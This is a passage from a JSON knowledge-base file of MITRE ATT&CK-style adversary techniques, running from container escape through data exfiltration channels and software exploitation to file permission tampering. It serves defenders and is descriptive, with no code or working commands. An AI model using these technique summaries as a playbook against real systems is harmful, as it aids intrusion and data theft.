Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.<sup>[[Windows Server Containers Are Open](https://app.tidalcyber.com/references/9a801256-5852-433e-95bd-768f9b70b9fe)]</sup>\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Linux",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "bebaf25b-9f50-4e3b-96cc-cc55c5765b61",
|
||
"value": "Escape to Host"
|
||
},
|
||
{
|
||
"description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup> In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) for malicious purposes.<sup>[[Free Trial PurpleUrchin](https://app.tidalcyber.com/references/841f397d-d103-56d7-9854-7ce43c684879)]</sup>\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "9a2d6628-0dd7-4f25-a242-b752fcf47ff4",
|
||
"value": "Establish Accounts"
|
||
},
|
||
{
|
||
"description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup><sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>\n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.<sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup><sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup><sup>[[amnesia malware](https://app.tidalcyber.com/references/489a6c57-f64c-423b-a7bd-169fa36c4cdf)]</sup>\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e1e42979-d3cd-461b-afc4-a6373cbf97ba",
|
||
"value": "Event Triggered Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.<sup>[[FireEye Kevin Mandia Guardrails](https://app.tidalcyber.com/references/0c518eec-a94e-42a7-8eb7-527ae3e279b6)]</sup> Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.<sup>[[FireEye Outlook Dec 2019](https://app.tidalcyber.com/references/f23a773f-9c50-4193-877d-97f7c13f48f1)]</sup>\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "aca9cbac-5c11-4050-8d9c-2a947c89a1e8",
|
||
"value": "Execution Guardrails"
|
||
},
|
||
{
|
||
"description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88) can be done using various common operating system utilities such as [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc)/SMB or FTP.<sup>[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)]</sup> On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "192d25ea-bae1-48e4-88de-e0acd481ab88",
|
||
"value": "Exfiltration Over Alternative Protocol"
|
||
},
|
||
{
|
||
"description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "89203cae-d3f1-4eef-9b5a-29042eb05d19",
|
||
"value": "Exfiltration Over C2 Channel"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d8541e2d-6bdd-4ec0-95c4-c0f657502d5f",
|
||
"value": "Exfiltration Over Other Network Medium"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f",
|
||
"value": "Exfiltration Over Physical Medium"
|
||
},
|
||
{
|
||
"description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "66768217-acdd-4b52-902f-e29483630ad6",
|
||
"value": "Exfiltration Over Web Service"
|
||
},
|
||
{
|
||
"description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) and [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "068df3d7-f788-44e4-9e6b-2ae443af1609",
|
||
"value": "Exploitation for Client Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. \n\nCredentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.<sup>[[Technet MS14-068](https://app.tidalcyber.com/references/db78c095-b7b2-4422-8473-49d4a1129b76)]</sup><sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup> Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.<sup>[[Bugcrowd Replay Attack](https://app.tidalcyber.com/references/ed31056c-23cb-5cb0-9b70-f363c54b27f7)]</sup><sup>[[Comparitech Replay Attack](https://app.tidalcyber.com/references/a9f0b569-8f18-579f-bf98-f4f9b93e5524)]</sup><sup>[[Microsoft Midnight Blizzard Replay Attack](https://app.tidalcyber.com/references/5af0008b-0ced-5d1d-bbc9-6c9d60835071)]</sup>\n\nSuch exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.<sup>[[Storm-0558 techniques for unauthorized email access](https://app.tidalcyber.com/references/74fd79a9-09f7-5149-a457-687a1e2989de)]</sup>\n\nExploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "afdfa503-0464-4b42-a79c-a6fc828492ef",
|
||
"value": "Exploitation for Credential Access"
|
||
},
|
||
{
|
||
"description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\n\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries <sup>[[Salesforce zero-day in facebook phishing attack](https://app.tidalcyber.com/references/cbd360bb-f4b6-5326-8861-b05f3a2a8737)]</sup>, evade security logs <sup>[[Bypassing CloudTrail in AWS Service Catalog](https://app.tidalcyber.com/references/de50bd67-96bb-537c-b91d-e541a717b7a1)]</sup>, or deploy hidden infrastructure.<sup>[[GhostToken GCP flaw](https://app.tidalcyber.com/references/3f87bd65-4194-5be6-93a1-acde6eaef547)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "15b65bf2-dbe5-47bc-be09-ed97684bf391",
|
||
"value": "Exploitation for Defense Evasion"
|
||
},
|
||
{
|
||
"description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) or [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "9cc715d7-9969-485f-87a2-c9f7ed3cc44c",
|
||
"value": "Exploitation for Privilege Escalation"
|
||
},
|
||
{
|
||
"description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://app.tidalcyber.com/technique/5bab1234-8d1e-437f-88a0-d527b2dfc6cd) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB <sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup> and RDP <sup>[[NVD CVE-2017-0176](https://app.tidalcyber.com/references/82602351-0ab0-48d7-90dd-f4536b4d009b)]</sup> as well as applications that may be used within internal networks such as MySQL <sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup> and web server services.<sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup>\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) as a result of lateral movement exploitation as well.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "51ff4ada-8a71-4801-9cb8-a6e216eaa4e4",
|
||
"value": "Exploitation of Remote Services"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.<sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup><sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup><sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup> Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391) or [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.<sup>[[Mandiant Fortinet Zero Day](https://app.tidalcyber.com/references/7bdc5bbb-ebbd-5eb8-bd10-9087c883aea7)]</sup><sup>[[Wired Russia Cyberwar](https://app.tidalcyber.com/references/28c53a97-5500-5bfb-8aac-3c0bf94c2dfe)]</sup>\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.<sup>[[OWASP Top 10](https://app.tidalcyber.com/references/c6db3a77-4d01-4b4d-886d-746d676ed6d0)]</sup><sup>[[CWE top 25](https://app.tidalcyber.com/references/d8ee8b1f-c18d-48f3-9758-6860cd31c3e3)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a",
|
||
"value": "Exploit Public-Facing Application"
|
||
},
|
||
{
|
||
"description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) and [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) can also be used externally.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup>\n\nAccess to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup> Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.<sup>[[Trend Micro Exposed Docker Server](https://app.tidalcyber.com/references/05c8909c-749c-4153-9a05-173d5d7a80a9)]</sup><sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4",
|
||
"value": "External Remote Services"
|
||
},
|
||
{
|
||
"description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1",
|
||
"value": "Fallback Channels"
|
||
},
|
||
{
|
||
"description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.<sup>[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]</sup> Custom tools may also be used to gather file and directory information and interact with the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560). Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>\n\nSome files and directories may require elevated or specific user permissions to access.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "1492c4ba-c933-47b8-953d-6de3db8cfce8",
|
||
"value": "File and Directory Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote 